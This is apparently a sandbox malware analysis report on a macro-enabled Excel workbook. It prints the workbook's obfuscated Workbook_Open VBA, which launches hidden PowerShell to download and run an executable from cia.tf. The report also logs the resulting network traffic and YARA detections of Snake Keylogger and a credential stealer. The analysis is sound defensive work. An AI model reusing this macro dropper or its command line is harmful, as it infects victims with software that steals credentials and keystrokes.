                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):165
                                                                                          Entropy (8bit):1.4377382811115937
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                                                          MD5:797869BB881CFBCDAC2064F92B26E46F
                                                                                          SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                                                          SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                                                          SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                                                          Malicious:false
                                                                                          Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):165
                                                                                          Entropy (8bit):1.4377382811115937
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                                                          MD5:797869BB881CFBCDAC2064F92B26E46F
                                                                                          SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                                                          SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                                                          SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                                                          Malicious:true
                                                                                          Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                          File type:Microsoft Excel 2007+
                                                                                          Entropy (8bit):7.994011749688452
                                                                                          TrID:
                                                                                          • Excel Microsoft Office Open XML Format document with Macro (52504/1) 54.97%
                                                                                          • Excel Microsoft Office Open XML Format document (35004/1) 36.65%
                                                                                          • ZIP compressed archive (8000/1) 8.38%
                                                                                          File name:7qsPAygCOx.xlsx
                                                                                          File size:449'271 bytes
                                                                                          MD5:9bf51f7bdf35911324a4fbb9235090f7
                                                                                          SHA1:d1abcb2b543a4c0f308dade69d1be6a96f356a3b
                                                                                          SHA256:b416b3cd07533aa1e3f322bbf904be65df03dcf08507ef9a683271a3c4848025
                                                                                          SHA512:c678628535508e250605babc13d899c598ab1466294b7917d583b577fb5362346b47952d684622c445512753980329ecc513934a7391b7511f7fc1588d981aff
                                                                                          SSDEEP:12288:Zl3PBexJxH0cZtSlOSgjG3IWNqAvfTYxv25F3:Z5PBexJJF2cSwG4ofTn55
                                                                                          TLSH:6BA42302D3293ECFF813537B5DD09B8480E03CD2594B241E3A1AA879659B4FFA55BB5C
                                                                                          Icon Hash:2562ab89a7b7bfbf
                                                                                          Document Type:OpenXML
                                                                                          Number of OLE Files:1
                                                                                          Has Summary Info:
                                                                                          Application Name:
                                                                                          Encrypted Document:False
                                                                                          Contains Word Document Stream:False
                                                                                          Contains Workbook/Book Stream:True
                                                                                          Contains PowerPoint Document Stream:False
                                                                                          Contains Visio Document Stream:False
                                                                                          Contains ObjectPool Stream:False
                                                                                          Flash Objects Count:0
                                                                                          Contains VBA Macros:True
                                                                                          Author:Dell
                                                                                          Last Saved By:george
                                                                                          Create Time:2021-08-19T14:03:52Z
                                                                                          Last Saved Time:2024-11-21T13:33:54Z
                                                                                          Creating Application:Microsoft Excel
                                                                                          Security:0
                                                                                          Thumbnail Scaling Desired:false
                                                                                          Company:
                                                                                          Contains Dirty Links:false
                                                                                          Shared Document:false
                                                                                          Changed Hyperlinks:false
                                                                                          Application Version:16.0300
                                                                                          General
                                                                                          Stream Path:VBA/Sheet1
                                                                                          VBA File Name:Sheet1.cls
                                                                                          Stream Size:1181
                                                                                          Attribute VB_Name = "Sheet1"
                                                                                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                          Attribute VB_GlobalNameSpace = False
                                                                                          Attribute VB_Creatable = False
                                                                                          Attribute VB_PredeclaredId = True
                                                                                          Attribute VB_Exposed = False
                                                                                          Attribute VB_TemplateDerived = False
                                                                                          Attribute VB_Customizable = True
                                                                                          

                                                                                          General
                                                                                          Stream Path:VBA/ThisWorkbook
                                                                                          VBA File Name:ThisWorkbook.cls
                                                                                          Stream Size:2859
                                                                                          Attribute VB_Name = "ThisWorkbook"
                                                                                          Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                                          Attribute VB_GlobalNameSpace = False
                                                                                          Attribute VB_Creatable = False
                                                                                          Attribute VB_PredeclaredId = True
                                                                                          Attribute VB_Exposed = False
                                                                                          Attribute VB_TemplateDerived = False
                                                                                          Attribute VB_Customizable = True
                                                                                          Private Sub Workbook_Open()
                                                                                          Dim Lxhraxtl As String, sOutput As String
                                                                                          Dim Hthql As Object, HthqlExec As Object
                                                                                          Lxhraxtl = "^p*o^*w*e*r*s^^*h*e*l^*l* *^-*W*i*n*^d*o*w^*S*t*y*^l*e* *h*i*^d*d*^e*n^* *-*e*x*^e*c*u*t*^i*o*n*pol^icy* *b*yp^^ass*;* $TempFile* *=* *[*I*O*.*P*a*t*h*]*::GetTem*pFile*Name() | Ren^ame-It^em -NewName { $_ -replace 'tmp$', 'exe' } Pass*Thru; In^vo*ke-We^bRe*quest -U^ri ""https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe"" -Out*File $TempFile; St*art-Proce*ss $TempFile;"
                                                                                          Lxhraxtl = Replace(Lxhraxtl, "*", "")
                                                                                          Lxhraxtl = Replace(Lxhraxtl, "^", "")
                                                                                          Set Hthql = CreateObject("WScript.Shell")
                                                                                          Set HthqlExec = Hthql.Exec(Lxhraxtl)
                                                                                          End Sub
                                                                                          

                                                                                          General
                                                                                          Stream Path:PROJECT
                                                                                          CLSID:
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Stream Size:476
                                                                                          Entropy:5.123519453381166
                                                                                          Base64 Encoded:True
                                                                                          Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 5 C 5 E F 0 5 6 1 0 B 6 1 4 B 6 1 4 B 3 1 9 B 3 1 9 " . . D P B = " B 8 B A 1 4 7 B 3 1 7 B 3 1 8 4 C F 7 C 3 1 1 C 6 C 9 B E 6 2 6 0 1 5 6 C C A
                                                                                          General
                                                                                          Stream Path:PROJECTwm
                                                                                          CLSID:
                                                                                          File Type:data
                                                                                          Stream Size:62
                                                                                          Entropy:3.0554671543224337
                                                                                          Base64 Encoded:False
                                                                                          Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . . .
                                                                                          General
                                                                                          Stream Path:VBA/_VBA_PROJECT
                                                                                          CLSID:
                                                                                          File Type:data
                                                                                          Stream Size:1906
                                                                                          Entropy:3.94946435014848
                                                                                          Base64 Encoded:False
                                                                                          General
                                                                                          Stream Path:VBA/__SRP_0
                                                                                          CLSID:
                                                                                          File Type:data
                                                                                          Stream Size:2324
                                                                                          Entropy:3.680089757467968
                                                                                          Base64 Encoded:False
                                                                                          General
                                                                                          Stream Path:VBA/__SRP_1
                                                                                          CLSID:
                                                                                          File Type:data
                                                                                          Stream Size:238
                                                                                          Entropy:1.6407554654577468
                                                                                          Base64 Encoded:False
                                                                                          General
                                                                                          Stream Path:VBA/__SRP_2
                                                                                          CLSID:
                                                                                          File Type:data
                                                                                          Stream Size:1154
                                                                                          Entropy:2.552347549542373
                                                                                          Base64 Encoded:False
                                                                                          General
                                                                                          Stream Path:VBA/__SRP_3
                                                                                          CLSID:
                                                                                          File Type:data
                                                                                          Stream Size:156
                                                                                          Entropy:1.7820663630707385
                                                                                          Base64 Encoded:False
                                                                                          General
                                                                                          Stream Path:VBA/__SRP_4
                                                                                          CLSID:
                                                                                          File Type:data
                                                                                          Stream Size:432
                                                                                          Entropy:1.6340463425878387
                                                                                          Base64 Encoded:False
                                                                                          General
                                                                                          Stream Path:VBA/__SRP_5
                                                                                          CLSID:
                                                                                          File Type:data
                                                                                          Stream Size:106
                                                                                          Entropy:1.3591119461716878
                                                                                          Base64 Encoded:False
                                                                                          General
                                                                                          Stream Path:VBA/dir
                                                                                          CLSID:
                                                                                          File Type:data
                                                                                          Stream Size:229
                                                                                          Entropy:5.697804813447464
                                                                                          Base64 Encoded:False
                                                                                          Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                          Nov 25, 2024 15:07:16.690402031 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.690517902 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.691318035 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.691328049 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.691340923 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.691395998 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.704185009 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.704258919 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.704262018 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.704294920 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.704323053 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.716020107 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.716084003 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.716109037 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.716118097 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.716144085 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.723721981 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.723809958 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.723828077 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.723839998 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.723862886 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.730762005 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.730839968 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.730849981 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.730892897 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:16.935332060 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:16.935384035 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:17.276104927 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:17.276129007 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:17.276223898 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:17.280040979 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:17.280052900 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:17.280065060 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:17.280138969 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:17.280144930 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:17.280162096 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:17.280196905 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:17.280201912 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:17.280216932 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:17.280265093 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:17.491328001 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:17.689127922 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:17.748414993 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:17.748433113 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:17.748445034 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:17.748483896 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:17.748500109 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:17.748508930 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:17.748518944 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:17.748528004 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:17.748528957 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:17.748548031 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:17.748554945 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:17.748565912 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:17.748565912 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:17.748567104 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:17.748584986 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:17.748589993 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:17.748599052 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:17.748601913 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:17.748606920 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:17.748637915 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:17.748647928 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:17.748656034 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:17.748680115 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:17.967324018 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:17.967390060 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.065577030 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.065591097 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.065606117 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.065638065 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.065649033 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.065658092 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.065671921 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.065685987 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.065709114 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.065710068 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.065745115 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.065777063 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.202059984 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.202075005 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.202097893 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.202146053 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.202189922 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.202208042 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.202239037 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.415338039 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.415452957 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.446528912 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.446559906 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.446641922 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.455674887 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.455702066 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.455717087 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.455785990 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.455794096 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.455802917 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.455815077 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.455835104 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.455840111 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.455876112 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.455899000 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.503288031 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.503326893 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.503393888 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.512074947 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.512104988 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.512124062 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.512140036 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.512214899 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.512253046 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.563730955 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.563782930 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.563890934 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.573275089 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.573313951 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.573332071 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.573347092 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.573410988 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.573445082 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.722760916 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.722795963 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.722883940 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.731087923 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.731096983 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.731115103 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.731129885 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.731242895 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.731242895 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.778738022 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.778784990 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.778898001 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.786335945 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.786345959 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.786360025 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.786385059 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.786437035 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.786492109 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.832542896 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.832566023 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.832582951 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.832602024 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.832690954 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.832745075 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.839246035 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.839251995 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.839263916 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.839276075 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.839329004 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.839385033 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.885035992 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.885056973 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.885085106 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.885099888 CET44349163104.21.1.182192.168.2.22
                                                                                          Nov 25, 2024 15:07:18.885164976 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.885215044 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.885230064 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.947868109 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:18.994313955 CET49163443192.168.2.22104.21.1.182
                                                                                          Nov 25, 2024 15:07:19.112240076 CET49163443192.168.2.22104.21.1.182
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 25, 2024 15:07:13.357225895 CET | 54562 | 53 | 192.168.2.22 | 8.8.8.8
Nov 25, 2024 15:07:13.632042885 CET | 53 | 54562 | 8.8.8.8 | 192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 25, 2024 15:07:13.357225895 CET | 192.168.2.22 | 8.8.8.8 | 0x8a63 | Standard query (0) | cia.tf | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 25, 2024 15:07:13.632042885 CET | 8.8.8.8 | 192.168.2.22 | 0x8a63 | No error (0) | cia.tf | | 104.21.1.182 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 15:07:13.632042885 CET | 8.8.8.8 | 192.168.2.22 | 0x8a63 | No error (0) | cia.tf | | 172.67.129.178 | A (IP address) | IN (0x0001) | false
                                                                                          • cia.tf
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49163 | 104.21.1.182 | 443 | 3532 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-25 14:07:15 UTC | 186 | OUT | GET /2ed7362e959d42385d4e6d231a6840dd.exe HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005
                                                                                          Host: cia.tf
                                                                                          Connection: Keep-Alive
2024-11-25 14:07:15 UTC | 975 | IN | HTTP/1.1 200 OK
                                                                                          Date: Mon, 25 Nov 2024 14:07:15 GMT
                                                                                          Content-Type: application/octet-stream
                                                                                          Content-Length: 1072096
                                                                                          Connection: close
                                                                                          Cache-Control: public, max-age=14400
                                                                                          content-disposition: attachment; filename="Offer to purchase.exe"
                                                                                          etag: W/"105be0-1934e18f460"
                                                                                          last-modified: Thu, 21 Nov 2024 09:41:18 GMT
                                                                                          x-powered-by: Express
                                                                                          CF-Cache-Status: REVALIDATED
                                                                                          Accept-Ranges: bytes
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zFOJ9tt55xf7T9lpF%2FgmqoXUEzj2xuV8RPuUbVYSwxqyqmcO1rq5Krs6CxZkKHw1RY1jqkrfY09KfuMmNnMbVMR15Swsi%2FZ3OeGojkguQu3la3E1Cb4pnL4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8e82343858f98c2f-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=6377&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2807&recv_bytes=800&delivery_rate=1517671&cwnd=252&unsent_bytes=0&cid=45b2bf0c993284dd&ts=868&x=0"



                                                                                          Target ID:0
                                                                                          Start time:09:07:07
                                                                                          Start date:25/11/2024
                                                                                          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                          Imagebase:0x13f960000
                                                                                          File size:28'253'536 bytes
                                                                                          MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          Target ID:2
                                                                                          Start time:09:07:09
                                                                                          Start date:25/11/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;
                                                                                          Imagebase:0x13f680000
                                                                                          File size:443'392 bytes
                                                                                          MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:moderate
                                                                                          Has exited:true

                                                                                          Target ID:5
                                                                                          Start time:09:07:18
                                                                                          Start date:25/11/2024
                                                                                          Path:C:\Users\user\AppData\Local\Temp\tmp7752.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\tmp7752.exe"
                                                                                          Imagebase:0x1310000
                                                                                          File size:1'072'096 bytes
                                                                                          MD5 hash:2ED7362E959D42385D4E6D231A6840DD
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.492354767.0000000004A80000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.489076925.000000000297A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.489076925.000000000297A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000005.00000002.489076925.000000000297A000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.489076925.0000000002882000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
